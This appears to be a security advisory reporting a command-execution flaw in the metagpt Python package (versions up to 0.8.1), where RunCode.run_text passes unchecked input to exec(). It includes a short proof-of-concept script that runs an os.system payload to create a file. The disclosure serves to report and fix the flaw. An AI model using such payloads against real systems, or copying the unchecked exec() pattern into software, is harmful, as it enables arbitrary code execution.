# Command Execution in metagpt(PyPI)
## Basic information
Author: Chuanhao Wan(chuanhaowan@hust.edu.cn)

Vulnerable pypi package: metagpt

PyPI url: https://pypi.org/project/metagpt/

Github url: https://github.com/geekan/MetaGPT

Affected version: <=0.8.1

Vulnerable source file: metagpt/actions/run_code.py

The vulnerable function(line 82 - 90) in the vulnerable file is:
```python
82    @classmethod
83    async def run_text(cls, code) -> Tuple[str, str]:
84        try:
85            # We will document_store the result in this dictionary
86            namespace = {}
87            exec(code, namespace)
88        except Exception as e:
89            return "", str(e)
90        return namespace.get("result", ""), ""
```
Command execution vulnerability can be triggered in the ```exec``` API call at line 87 in corresponding file, because the argument  ```code``` is not checked and validated before being executed.

## Exploit
Environment preparation: Linux, python 3.9+, ```pip install metagpt```

Create a ```exploit.py``` file that contains:
```python
from metagpt.actions.run_code import RunCode
import asyncio

payload = "import os; os.system('touch hack.txt')"
asyncio.run(RunCode.run_text(payload))
```
Run ```python exploit.py```, the ```payload``` will be executed and create a ```hack.txt``` file in work folder.
Almost all passed code can be executed.
